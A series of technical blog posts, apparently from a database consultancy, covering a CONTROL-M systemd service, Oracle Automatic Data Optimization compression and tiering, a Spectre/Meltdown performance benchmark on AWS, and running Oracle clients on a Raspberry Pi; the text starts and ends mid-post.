    [root@ctmagtli1 system]# chmod 644 ctmag.service
    [root@ctmagtli1 system]# systemctl daemon-reload
    [root@ctmagtli1 system]# systemctl enable ctmag.service
    Created symlink from /etc/systemd/system/multi-user.target.wants/ctmag.service
      to /etc/systemd/system/ctmag.service.
    [root@ctmagtli1 system]# systemctl reboot

 

A well-functioning test can be performed by running service ctmag stop/start with root privileges and monitoring results of :

  • watch ‘ps -ef | grep ctm’
  • /home/ctmuser/ctmagent/ctm/scripts/ag_diag_comm
  • service ctmag status
CONTROL-M/EM

For EM we will apply the existing BMC procedure.
With root privileges, create the service file as described  below.

    [root@emserver system]# cat /etc/systemd/system/EM.service
    [Unit]
    Description=CONTROL-M/EM
    After=systemd-user-sessions.service multi-user.target network.target
    [Service]
    User=emuser
    ExecStart=/bin/sh -c /home/emuser/bin/start_server;/home/emuser/bin/start_ns_daemon;/home/emuser/bin/start_cms;/home/emuser/bin/start_config_agent
    Type=forking
    RemainAfterExit=yes
    ExecStop=/bin/sh -c /home/emuser/bin/stop_config_agent;/home/emuser/bin/stop_cms;/home/emuser/bin/stop_ns_daemon;/home/emuser/bin/home/em50/bin/stop_server
    [Install]
    WantedBy=multi-user.target

 

Give appropriate file permissions and enable the service. A system reboot will be necessary.

    [root@emserver system]# chmod 644 EM.service
    [root@emserver system]# systemctl daemon-reload
    [root@emserver system]# systemctl enable EM.service
    Created symlink from /etc/systemd/system/multi-user.target.wants/EM.service
      to /etc/systemd/system/EM.service.
    [root@emserver system]# systemctl reboot

 

A well-functioning test can be performed by running service EM stop/start with root privileges and monitoring results of :

  • watch ‘ps -ef | grep em’
  • root_menu
  • service EM status

 

 

Cet article Automatic start/stop for CONTROL-M v9 est apparu en premier sur Blog dbi services.

Automatic Data Optimization Part II : StorageTiering

Thu, 2018-01-11 12:07

In first a previous blog, we saw how Automatic Data Optimization can be used to compress data under predefined conditions. In this blog we will see that another possible action with ADO is to move data to another storage. Indeed we will demonstrate how it is possible to move a table to another tablespace based on predefined conditions.
We are using oracle a 12.1.0.2 non-CDB database.
Let’s considerer following table ARTICLE in the tablespace USERS

SQL> col TABLE_NAME for a20
SQL> select table_name,tablespace_name from user_tables where table_name='ARTICLE';
TABLE_NAME TABLESPACE_NAME
-------------------- ------------------------------
ARTICLE USERS

Now let’s create a target tablespace named COOLTAB. The table ARTICLE will be moved to this new COOLTAB tablespace depending on conditions we will define.

SQL> create tablespace COOLTAB datafile '/u01/app/oracle/oradata/NONCONT/cooltab01.dbf' size 50M;
Tablespace created.

As specified in the previous blog, the Heat Map must be enabled by setting the parameter HEAT_MAP to ON.

SQL> show parameter heat_map;
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
heat_map string ON

We can verify that heat map statistics are collected for table ARTICLE. It can be useful to gather statistics for ARTICLE using DBMS_STATS.

SQL> SELECT OBJECT_NAME, to_char(TRACK_TIME,'DD-MON-YYYY HH24:MI:SS'), SEGMENT_WRITE "Seg_write",SEGMENT_READ "Seg_read", FULL_SCAN, LOOKUP_SCAN FROM v$heat_map_segment WHERE object_name='ARTICLE';
OBJECT_NAME TO_CHAR(TRACK_TIME,'DD-MON-YY Seg Seg FUL LOO
------------------------------ ----------------------------- --- --- --- ---
ARTICLE 10-JAN-2018 09:40:48 NO NO YES NO

Before creating the storage tiering policy, let’s verify the status of our tablespaces. We can see that all the tablespaces are online

SQL> select tablespace_name,status from dba_tablespaces;
TABLESPACE_NAME STATUS
------------------------------ ---------
SYSTEM ONLINE
SYSAUX ONLINE
UNDOTBS1 ONLINE
TEMP ONLINE
USERS ONLINE
EXAMPLE ONLINE
COOLTAB ONLINE
7 rows selected.

Now we are going to define a tiering policy which will move table ARTICLE from tablespace USERS to COOLTAB if there is no access to ARTICLE in the last 30 days. The policy will also put the tablespace COOLTAB in READ ONLY status.

SQL> ALTER TABLE ARTICLE ILM ADD POLICY TIER TO COOLTAB READ ONLY SEGMENT AFTER 30 DAYS OF NO ACCESS;
Table altered.

If we query the dba_ilmparameters we can see that for the demonstration the policy_time is set to 1. This means that 30 days are considered as 30 seconds due to the policy time

SQL> select * from dba_ilmparameters;
NAME VALUE
-------------------- ----------
ENABLED 1
RETENTION TIME 30
JOB LIMIT 2
EXECUTION MODE 2
EXECUTION INTERVAL 15
TBS PERCENT USED 85
TBS PERCENT FREE 25
POLICY TIME 1
8 rows selected.

We can verify that the policy is created

SELECT policy_name, action_type, condition_type, condition_days FROM user_ilmdatamovementpolicies where action_type='STORAGE';
POLICY_NAM ACTION_TYPE CONDITION_TYPE CONDITION_DAYS
---------- ----------- ---------------------- --------------
P65 STORAGE LAST ACCESS TIME 30

And that the policy is enabled

SQL> SELECT policy_name, object_name, enabled FROM user_ilmobjects where policy_name='P65';
POLICY_NAM OBJECT_NAME ENA
---------- --------------- ---
P65 ARTICLE YES

By default ADO policies are automatically triggered during maintenance window. But in this demonstration we are going to manually execute the policy without waiting the maintenance window. So after 30 days of non-access (in fact 30 seconds) let’s trigger the policy

SQL> EXEC dbms_ilm.flush_all_segments;
PL/SQL procedure successfully completed.
.
DECLARE
v_executionid number;
BEGIN
dbms_ilm.execute_ILM (ILM_SCOPE => dbms_ilm.SCOPE_SCHEMA,
execution_mode => dbms_ilm.ilm_execution_offline,
task_id => v_executionid);
END;
/
PL/SQL procedure successfully completed.

Let’s verify the result of the job. We can see that the job was successful

SQL> SELECT task_id, job_name, job_state, completion_time completion FROM user_ilmresults ORDER BY 1 ;
TASK_ID
----------
JOB_NAME
--------------------------------------------------------------------------------
JOB_STATE
-----------------------------------
COMPLETION
---------------------------------------------------------------------------
86
ILMJOB232
COMPLETED SUCCESSFULLY
10-JAN-18 02.28.31.506590 PM

And if we query again the USER_TABLES, we can see that the table ARTICLE were moved from tablespace USERS to tablespace COOLTAB.

SQL> col TABLE_NAME for a20
SQL> select table_name,tablespace_name from user_tables where table_name='ARTICLE';
TABLE_NAME TABLESPACE_NAME
-------------------- ------------------------------
ARTICLE COOLTAB

And if we query the dba_tablespaces, we can see that now the tablespace COOLTAB is now in READ ONLY STATUS

SQL> select tablespace_name,status from dba_tablespaces;
TABLESPACE_NAME STATUS
------------------------------ ---------
SYSTEM ONLINE
SYSAUX ONLINE
UNDOTBS1 ONLINE
TEMP ONLINE
USERS ONLINE
EXAMPLE ONLINE
COOLTAB READ ONLY
7 rows selected.

Conclusion: We have seen how ADO can help us to move data. Note that this movement can also be based on the fullness threshold of the source tablespace. One condition should be for example to move the table if the source tablespace is full at 65%.

 

Cet article Automatic Data Optimization Part II : StorageTiering est apparu en premier sur Blog dbi services.

Automatic Data Optimization Part I : Compression Tiering

Wed, 2018-01-10 15:15

Nowadays data are increasing more and more. And some challenges we can face can be how to reduce storage costs and how to improve performance. With Oracle 12c, the feature Automatic Data Optimization (ADO) can help us.
In this first blog we will see how we can use ADO to compress data under predefined conditions.
ADO is part of Information Lifecycle Management (ILM). Note that ADO requires Advanced Compression Option.
In this article we are using oracle a 12.1.0.2 non-CDB database.
First let’s create the user we will use for the demonstration

SQL> create user app identified by app default tablespace users temporary tablespace temp;
User created.
.
SQL> grant create session,create table,alter tablespace,select any dictionary,unlimited tablespace to app;
Grant succeeded.

Now with this user let’s create a table and let’s insert some data
SQL> show user
USER is "APP"
SQL> create table article(idart number,designation varchar2(20));
Table created.
.
SQL> select count(*) from article;
COUNT(*)
----------
1048576

What we will demonstrate is how data in table ARTICLE can be automatically compressed if they are not modified within the last 30 days for example. It’s just an example and there are many other conditions.
First let’s verify that the compression attribute of the table article is disabled
SQL> show user
USER is "APP"
SQL> SELECT compression, compress_for FROM user_tables WHERE table_name = 'ARTICLE';
COMPRESS COMPRESS_FOR
-------- ------------------------------
DISABLED

We can also confirm that there is no compression in the table using this oracle script.
[oracle@serverora1 ]$ cat comp_art.sql
SELECT CASE compression_type
WHEN 1 THEN 'No Compression'
WHEN 2 THEN 'Advanced compression level'
WHEN 4 THEN 'Hybrid Columnar Compression for Query High'
WHEN 8 THEN 'Hybrid Columnar Compression for Query Low'
WHEN 16 THEN 'Hybrid Columnar Compression for Archive High'
WHEN 32 THEN 'Hybrid Columnar Compression for Archive Low'
WHEN 64 THEN 'Compressed row'
WHEN 128 THEN 'High compression level for LOB operations'
WHEN 256 THEN 'Medium compression level for LOB operations'
WHEN 512 THEN 'Low compression level for LOB operations'
WHEN 1000 THEN 'Minimum required number of LOBs in the object for which LOB compression ratio is to be estimated'
WHEN 4096 THEN 'Basic compression level'
WHEN 5000 THEN 'Maximum number of LOBs used to compute the LOB compression ratio'
WHEN 1000000 THEN 'Minimum required number of rows in the object for which HCC ratio is to be estimated'
WHEN -1 THEN 'To indicate the use of all the rows in the object to estimate HCC ratio'
WHEN 1 THEN 'Identifies the object whose compression ratio is estimated as of type table'
ELSE 'Unknown Compression Type'
END AS compression_type, n as num_rows
FROM (SELECT compression_type, Count(*) n
FROM (SELECT dbms_compression.Get_compression_type(USER, 'ARTICLE', ROWID) AS COMPRESSION_TYPE
FROM app.article)
GROUP BY compression_type
);
[oracle@serverora1 ]$

Below we can see that there is no compressed data
SQL> col COMPRESSION_TYPE for a20
SQL> @comp_art
COMPRESSION_TYPE NUM_ROWS
-------------------- ----------
No Compression 1048576

To use ADO for compression, the Heat Map must be enabled. Indeed once enabled, Heat Map will collect statistics required for ADO actions. All accesses are tracked by the in-memory activity tracking module. So let’s enable the Heat Map at instance level

SQL> show parameter heat
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
heat_map string OFF
.
SQL> alter system set heat_map=ON scope=both;
System altered.
.
SQL> show parameter heat
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
heat_map string ON

By default the policy time is specified in days. If we query the DBA_ILMPARAMETERS, the value for POLICY TIME determines if ADO policies are specified in seconds or days. Values are 1 for seconds or 0 for days (default).

SQL> col name for a20
SQL> select * from DBA_ILMPARAMETERS;
NAME VALUE
-------------------- ----------
ENABLED 1
RETENTION TIME 30
JOB LIMIT 2
EXECUTION MODE 2
EXECUTION INTERVAL 15
TBS PERCENT USED 85
TBS PERCENT FREE 25
POLICY TIME 0
8 rows selected.

But in our demonstration we will not wait 30 days, so we will set the policy time in seconds instead of days and then if we specify 30 days this will mean 30 seconds.

SQL> EXEC dbms_ilm_admin.customize_ilm(dbms_ilm_admin.POLICY_TIME,dbms_ilm_admin.ILM_POLICY_IN_SECONDS);
PL/SQL procedure successfully completed.
.
SQL> select * from DBA_ILMPARAMETERS;
NAME VALUE
-------------------- ----------
ENABLED 1
RETENTION TIME 30
JOB LIMIT 2
EXECUTION MODE 2
EXECUTION INTERVAL 15
TBS PERCENT USED 85
TBS PERCENT FREE 25
POLICY TIME 1
8 rows selected.
SQL>

Before adding the ADO policy, we can verify that heat map statistics are already collected.

SELECT OBJECT_NAME, to_char(TRACK_TIME,'DD-MON-YYYY HH24:MI:SS'), SEGMENT_WRITE "Seg_write",
SEGMENT_READ "Seg_read", FULL_SCAN, LOOKUP_SCAN
FROM v$heat_map_segment WHERE object_name='ARTICLE';
.
OBJECT_NAME TO_CHAR(TRACK_TIME,'DD-MON-YY Seg Seg FUL LOO
------------------------------ ----------------------------- --- --- --- ---
ARTICLE 08-JAN-2018 17:02:21 NO NO YES NO
SQL>

Now let’s add a segment level row compression policy on ARTICLE table that will compress the segment when no modification on the segment will have occurred in the last 30 days (considered as 30 seconds due to the policy time).

SQL> show user
USER is "APP"
SQL> ALTER TABLE app.article ILM ADD POLICY ROW STORE COMPRESS ADVANCED SEGMENT AFTER 30 DAYS OF NO MODIFICATION;
Table altered.
SQL>

We can use the user_ilmdatamovementpolicies and user_ilmobjects with user app to verify the policy.

SQL> show user
USER is "APP"
SQL> SELECT policy_name, action_type, scope, compression_level, condition_type, condition_days FROM user_ilmdatamovementpolicies ORDER BY policy_name;
POLICY_NAME ACTION_TYPE SCOPE COMPRESSION_LEVEL CONDITION_TYPE CONDITION_DAYS
--------------- ----------- ------- ----------------- ---------------------- --------------
P45 COMPRESSION SEGMENT ADVANCED LAST MODIFICATION TIME 30
.
SQL> SELECT policy_name, object_name, enabled FROM user_ilmobjects;
POLICY_NAME OBJECT_NAME ENA
--------------- -------------------- ---
P45 ARTICLE YES

Flush the heat map statistics from memory to disk and let’s wait 30 days ( in fact 30 seconds because don’t forget the policy_time was changed to seconds instead of days). Can be also sometimes useful to gather the statistics of the table

SQL> EXEC dbms_ilm.flush_all_segments;
PL/SQL procedure successfully completed.
SQL>

By default ADO policies are automatically triggered during maintenance window. But in this demonstration we are going to manually execute the policy without waiting the maintenance window.

SQL> show user
USER is "APP"
SQL> DECLARE
v_executionid number;
BEGIN
dbms_ilm.execute_ILM (ILM_SCOPE => dbms_ilm.SCOPE_SCHEMA,
execution_mode => dbms_ilm.ilm_execution_offline,
task_id => v_executionid);
END;
/
PL/SQL procedure successfully completed.
SQL>

Some info about the job can be obtained in the following views

SQL> SELECT task_id, start_time as start_time FROM user_ilmtasks order by 1;
TASK_ID
----------
START_TIME
---------------------------------------------------------------------------
26
08-JAN-18 05.28.45.788076 PM
SQL>
.
SQL> SELECT task_id, job_name, job_state, completion_time completion
FROM user_ilmresults ORDER BY 1 ;
TASK_ID
----------
JOB_NAME
--------------------------------------------------------------------------------
JOB_STATE
-----------------------------------
COMPLETION
---------------------------------------------------------------------------
26
ILMJOB98
COMPLETED SUCCESSFULLY
08-JAN-18 05.28.49.368009 PM

We can see that job run successfully. And we can verify that compression in table ARTICLE is now enabled

SQL> SELECT compression, compress_for FROM user_tables WHERE table_name = 'ARTICLE';
COMPRESS COMPRESS_FOR
-------- ------------------------------
ENABLED ADVANCED
SQL>

And we also can see that all rows are compressed.

SQL> col COMPRESSION_TYPE for a20
SQL> @comp_art.sql
COMPRESSION_TYPE NUM_ROWS
-------------------- ----------
Advanced compression 1048576
level

Conclusion : In this first part we have seen that how ADO can help us for compression. In a second post we will talk about data movement with ADO.

 

Cet article Automatic Data Optimization Part I : Compression Tiering est apparu en premier sur Blog dbi services.

Spectre and Meltdown, Oracle Database, AWS, SLOB

Tue, 2018-01-09 15:23

Last year, I measured the CPU performance for an Oracle Database on several types of AWS instances. Just by curiosity, I’ve run the same test (SLOB cached reads) now that Amazon has applied all Spectre and Meltdown mitigation patches.

I must admit that I wanted to test this on the Oracle Cloud first. I’ve updated a IaaS instance to the latest kernel but the Oracle Unbreakable Enterprise Kernel does not include the Meltdown fix yet, and booting on the Red Hat Compatible Kernel quickly goes to a kernel panic not finding the root LVM.

This is not a benchmark you can rely on to estimate the CPU usage overhead on your application. This test is not doing system calls (so the KPTI fix should be at its minimal impact). If your application is bound on system calls (network roundtrips, physical reads) the consequences can be worse. But in that case, you have a design problem which was just masked by hardware, optimized, but insecure, by a processor running the code before testing.

Figures from last year: M4.xlarge: 4vCPU, 16GB RAM

M4 is hyper-threaded so with 2 Oracle processor licenses we can use 4 vCPU.
Here I was on Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, 2 cores with 2 threads each.
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 13.1 0.00 5.46
DB CPU(s): 1.0 13.1 0.00 5.46
Logical read (blocks): 874,326.7 11,420,189.2

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 2.0 27.3 0.00 9.24
DB CPU(s): 2.0 27.2 0.00 9.22
Logical read (blocks): 1,540,116.9 21,047,307.6

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 4.0 54.6 0.00 14.46
DB CPU(s): 4.0 54.3 0.00 14.39
Logical read (blocks): 1,779,361.3 24,326,538.0

Jan. 2018 with Spectre and Meltdown mitigation:

Same CPU now with the latest RedHat kernel.

[ec2-user@ip-172-31-15-31 ~]$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-3.10.0-693.11.6.el7.x86_64 root=UUID=3e11801e-5277-4d87-be4c-0a9a61fbc3da ro console=ttyS0,115200n8 console=tty0 net.ifnames=0 crashkernel=auto LANG=en_US.UTF-8

Here is the LIOPS result for the same runs.
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 13.7 0.00 4.69
DB CPU(s): 1.0 13.7 0.00 4.69
Logical read (blocks): 808,954.0 11,048,988.1

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 2.0 27.3 0.00 8.00
DB CPU(s): 2.0 27.1 0.00 7.96
Logical read (blocks): 1,343,662.0 18,351,369.1

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 4.0 42.9 0.00 13.49
DB CPU(s): 4.0 42.5 0.00 13.37
Logical read (blocks): 1,684,204.6 18,106,823.6

Jan. 2018, with Spectre and Meltdown patches, but disabled IBRS, IBPB, KPTI

The RedHat kernel has options to disable Indirect Branch Restricted Speculation, Indirect Branch Prediction Barriers and Kernel Page Table Isolation

[ec2-user@ip-172-31-15-31 ~]$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-3.10.0-693.11.6.el7.x86_64 root=UUID=3e11801e-5277-4d87-be4c-0a9a61fbc3da ro console=ttyS0,115200n8 console=tty0 net.ifnames=0 crashkernel=auto LANG=en_US.UTF-8 nopti noibrs noibpb

Here are the same runs after rebooting with nopti noibrs noibpb kernel options:
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 30.1 0.00 4.86
DB CPU(s): 1.0 29.8 0.00 4.80
Logical read (blocks): 861,138.5 25,937,061.0

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 2.0 27.3 0.00 8.00
DB CPU(s): 2.0 27.0 0.00 7.92
Logical read (blocks): 1,493,336.8 20,395,790.6

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 4.0 42.9 0.00 13.49
DB CPU(s): 4.0 42.4 0.00 13.34
Logical read (blocks): 1,760,218.4 18,911,346.0
Read IO requests: 33.5 360.2

Then with only KPTI disabled, but all Spectre mitigation enabled

Here only the page table isolation is is disabled.

[ec2-user@ip-172-31-15-31 ~]$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-3.10.0-693.11.6.el7.x86_64 root=UUID=3e11801e-5277-4d87-be4c-0a9a61fbc3da ro console=ttyS0,115200n8 console=tty0 net.ifnames=0 crashkernel=auto LANG=en_US.UTF-8 nopti

Here are the same runs witn only nopti kernel option:
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 30.1 0.00 3.91
DB CPU(s): 1.0 29.8 0.00 3.87
Logical read (blocks): 873,451.2 26,303,984.2

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 2.0 23.1 0.00 7.60
DB CPU(s): 2.0 22.9 0.00 7.54
Logical read (blocks): 1,502,151.4 17,360,883.8

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 4.0 42.9 0.00 12.64
DB CPU(s): 4.0 42.4 0.00 12.50
Logical read (blocks): 1,764,293.0 18,954,682.3

Large pages

The previous tests were using small pages. I did a quick test with KPTI enabled and SGA using large pages:
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 30.1 0.00 4.85
DB CPU(s): 1.0 30.1 0.00 4.85
Logical read (blocks): 854,682.1 27,672,906.8

Here is the same but with KPTI disabled:
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 30.1 0.00 4.85
DB CPU(s): 1.0 30.1 0.00 4.85
Logical read (blocks): 920,129.9 27,672,906.8

So what?

This is just a test on a synthetic workload. Nothing similar to a production database situation. However, those cached SLOB runs are doing what an optimized database application should do most of the time: read blocks from the buffer cache. At least this test is much better than the graphs without explanations, or the SELECT 1, that I have seen these days on social media.

Some interesting food for thought in those numbers, by the way.

Now vs. last year: between 5% and 12% degradation, which is what people have reported those days in general. That looks high but usually when we do database performance troubleshooting we are there to address queries with x10 to x100 CPU usage doing unnecessary stuff because of bad design or suboptimal execution plan.

If disable KPTI: degradation is less than 1%, so that’s an easy way to get the same performance if you are sure that you control all software running. At least temporarily before some database tuning is done.

If disable KPTI, IBRS and IBPB: not better than when disabling only KPTI. I’ve no explanation about that… Makes me wonder if those predictive branching are always a good idea.

In all case, if you are not allocating SGA with large pages, then you should. The KPTI degradation is lowered with large pages, which makes sense as the page table is smaller. And if you are not yet using large pages, the benefit will probably balance the KPTI degradation.

This is not a benchmark and your application may see a higher degradation if doing a lot of system calls. If you upgrade from an old kernel, you may even see an improvement thanks to other features compensating the mitigation ones.

 

Cet article Spectre and Meltdown, Oracle Database, AWS, SLOB est apparu en premier sur Blog dbi services.

Running the Oracle Client on a Raspberry Pi

Tue, 2018-01-09 11:57

What are the possibilities to use a Raspberry Pi computer as an Oracle client?

IMG_1653

Besides other things I’ll show a possibility in this Blog to run the fat/thick Oracle Client on a Raspberry Pi!

REMARK: All examples below were made with an Rasperry Pi 3 and the OS Raspbian, which can be downloaded from

https://www.raspberrypi.org/downloads

First of all what’s possible with Java and Thin Clients?
Running the Java-Programs sqldeveloper or its counterpart in command line mode sqlcl is of course possible on a Raspberry Pi:

1.) sqldeveloper

The prerequisite for running sqldveloper 17.4. (current version as of writing this Blog) is an installed JDK 1.8. As I had that installed by default, I could run sqldeveloper as documented. I.e.


pi@raspberrypi:~ $ sudo apt list --installed | grep jdk
oracle-java8-jdk/stable,now 8u65 armhf [installed] pi@raspberrypi:~ $ cd Oracle
pi@raspberrypi:~/Oracle $ unzip sqldeveloper-17.4.0.355.2349-no-jre.zip
...
pi@raspberrypi:~/Oracle $ cd sqldeveloper/
pi@raspberrypi:~/Oracle/sqldeveloper $ ./sqldeveloper.sh
 
Oracle SQL Developer
Copyright (c) 1997, 2017, Oracle and/or its affiliates. All rights reserved.

sqldeveloper

2.) sqlcl

Installing sqlcl is as easy as installing sqldeveloper:


pi@raspberrypi:~/Oracle $ unzip sqlcl-17.4.0.354.2224-no-jre.zip
...
pi@raspberrypi:~/Oracle $ alias sqlcl='/home/pi/Oracle/sqlcl/bin/sql'
pi@raspberrypi:~/Oracle $ sqlcl cbleile/cbleile@192.168.178.65:1521/prem122.localdomain
 
SQLcl: Release 17.4.0 Production on Tue Jan 09 14:28:56 2018
 
Copyright (c) 1982, 2018, Oracle. All rights reserved.
 
Last Successful login time: Thu Jan 04 2018 22:15:36 +01:00
 
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
 
SQL> set sqlformat ansiconsole
SQL> select table_name, tablespace_name from tabs;
TABLE_NAME TABLESPACE_NAME
T1 USERS
 
SQL>

3.) Running Java-Code using the JDBC Thin driver

Running Java-Code with access to Oracle is easy as well. Just download the JDBC Thin Driver ojdbc8.jar and put it somewhere on the Pi. In the example below I actually do use the ojdbc8.jar from sqlcl:


pi@raspberrypi:~/Oracle/Java $ more Conn.java
import java.sql.*;
class Conn {
public static void main (String[] args) throws Exception
{
Class.forName ("oracle.jdbc.OracleDriver");
 
Connection conn = DriverManager.getConnection ("jdbc:oracle:thin:@//192.168.178.65:1521/prem122.localdomain", "cbleile", "cbleile");
// @//machineName:port/SID, userid, password
try {
Statement stmt = conn.createStatement();
try {
ResultSet rset = stmt.executeQuery("select BANNER from SYS.V_$VERSION where BANNER like '%Enterprise Edition%'");
try {
while (rset.next())
System.out.println ("Connected to "+rset.getString(1));
}
finally {
try { rset.close(); } catch (Exception ignore) {}
}
}
finally {
try { stmt.close(); } catch (Exception ignore) {}
}
}
finally {
try { conn.close(); } catch (Exception ignore) {}
}
}
}
pi@raspberrypi:~/Oracle/Java $ javac Conn.java
pi@raspberrypi:~/Oracle/Java $ java -cp ../sqlcl/lib/ojdbc8.jar:. Conn
Connected to Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

4.) Running a fat Client on the Raspberry Pi

Is it actually possible to run the normal Oracle thick/fat Client on the Pi? As the Oracle Client Binaries are not available for the ARM processor it seems not possible, but emulating the x86-platform you actually can do it.

The easiest way to run x86-Code on a Raspberry Pi is to actually buy the product ExaGear Desktop from Eltechs ( https://eltechs.com ) for aound 20 Euros (they usually sell it for 16 Euros).
REMARK: You can actually also install the QEMU image from https://github.com/AlbrechtL/RPi-QEMU-x86-wine , but that’s far more effortful.

What is ExaGear? ExaGear is an emulator (i.e. a virtual machine) which emulates a x86 Debian Linux on your Raspberry Pi. After downloading ExaGear and unzipping it it’s installed easily on the Pi with just


$ sudo ./install-exagear.sh

Afterwards you can start it with the command exagear:


pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.9.59-v7+ #1047 SMP Sun Oct 29 12:19:23 GMT 2017 armv7l GNU/Linux
pi@raspberrypi:~ $ exagear
Starting /bin/bash in the guest image /opt/exagear/images/debian-8
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.9.59-v7+ #1047 SMP Sun Oct 29 12:19:23 GMT 2017 i686 GNU/Linux
pi@raspberrypi:~ $ arch
i686

I am now inside the x86 world. I.e. I can use this guest shell as if it were running on an x86 machine.
First I do update the repositories:


pi@raspberrypi:~ $ sudo apt-get update
...

The next step is to download the Oracle 32-Bit 12.2.-Client-Software to the raspberry pi. To be able to install the Oracle software a couple of libraries and programs need to be installed. I.e. inside exagear:


pi@raspberrypi:~/Oracle/Downloads/client32 $ sudo apt-get install libxrender1 libxtst6 libxi6 libaio1 make gcc gawk

To avoid some errors I also had to create 3 symbolic links:


pi@raspberrypi:~/Oracle/Downloads/client32 $ sudo ln -s /usr/lib/i386-linux-gnu/libpthread_nonshared.a /usr/lib/libpthread_nonshared.a
pi@raspberrypi:~/Oracle/Downloads/client32 $ sudo ln -s /usr/lib/i386-linux-gnu/libc_nonshared.a /usr/lib/libc_nonshared.a
pi@raspberrypi:~/Oracle/Downloads/client32 $ sudo ln -s /usr/bin/awk /bin/awk

At that point I could install the Oracle Client software as usual:


pi@raspberrypi:~/Oracle/Downloads/client32 $ ./runInstaller
Starting Oracle Universal Installer...
 
Checking Temp space: must be greater than 415 MB. Actual 1522 MB Passed
Checking swap space: must be greater than 150 MB. Actual 828 MB Passed
Checking monitor: must be configured to display at least 256 colors
>>> Could not execute /usr/bin/xdpyinfo Failed <<<<
 
Some requirement checks failed. You must fulfill these requirements before
 
continuing with the installation,
 
Continue? (y/n) [n] y

xdpyinfo can be installed by installing the x11-utils on Debian, but it’s actually not necessary, so just continue by answering “y” at the prompt.

The rest is a normal Oracle-Client installation. Here some screen shots:

runInstaller1_1

runInstaller2

runInstaller6

runInstaller8

runInstaller10

runInstaller12

I created my small script to set the environment and was then able to run the client-software:


pi@raspberrypi:~ $ more oraclient.sh
#!/bin/bash
 
export ORACLE_HOME=/home/pi/Oracle/app/pi/product/12.2.0/client_1
export PATH=$ORACLE_HOME/bin:$PATH
pi@raspberrypi:~ $ . ./oraclient.sh
pi@raspberrypi:~ $ sqlplus cbleile/cbleile@192.168.178.65:1521/prem122.localdomain
 
SQL*Plus: Release 12.2.0.1.0 Production on Tue Jan 9 16:04:36 2018
 
Copyright (c) 1982, 2016, Oracle. All rights reserved.
 
Last Successful login time: Thu Jan 04 2018 22:33:09 +01:00
 
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
 
SQL> select count(*) from all_objects;
 
COUNT(*)
----------
19640
 
SQL>

Everything worked as expected. I actually haven’t found any issue with the available Oracle programs:


pi@raspberrypi:~ $ ls $ORACLE_HOME/bin
adapters expdp lcsscan orapki.bat statusnc
adrci expdpO linkshlib oraxml symfind
adrciO extjob lmsgen oraxsl sysresv
aqxmlctl extjobo loadjava orion tkprof
aqxmlctl.pl extproc loadpsp osdbagrp tkprofO
bndlchk extprocO loadpspO osh tnsping
coraenv genagtsh lxchknlb ott tnsping0
dbfs_client genclntsh lxegen owm trcasst
dbgeu_run_action.pl genclntst lxinst platform_common trcroute
dbhome genezi mkstore plshprof trcroute0
dbshut geneziO mkstore.bat plshprofO uidrvci
dbstart gennfgt ncomp proc uidrvciO
deploync gennttab netmgr rconfig umu
dg4pwd genoccish oerr relink unzip
dg4pwdO genorasdksh oerr.pl rman wrap
dgmgrl gensyslib ojvmjava rmanO wrc
diagsetup imp ojvmtc roohctl wrcO
diskmon.bin impO orabase schema xml
dropjava impdp orabaseconfig skgxpinfo xmlwf
echodo impdpO orabasehome sqlldr zip
eusm kgmgr oraenv sqlldrO
exp kgmgrO orajaxb sqlplus
expO lbuilder orapki srvctl
pi@raspberrypi:~ $

Just for fun I started a Data Guard Observer on my Rasperry Pi and let it perform a fast-start failover followed by reinstating the previous Primary DB:


pi@raspberrypi:~ $ dgmgrl
DGMGRL for Linux: Release 12.2.0.1.0 - Production on Tue Jan 9 17:08:31 2018
 
Copyright (c) 1982, 2017, Oracle and/or its affiliates. All rights reserved.
 
Welcome to DGMGRL, type "help" for information.
DGMGRL> connect sys/manager@tismeds1
Connected to "TISMEDS1"
Connected as SYSDBA.
DGMGRL> show configuration;
 
Configuration - TISMED
 
Protection Mode: MaxAvailability
Members:
TISMEDS1 - Primary database
TISMEDS2 - Physical standby database
 
Fast-Start Failover: DISABLED
 
Configuration Status:
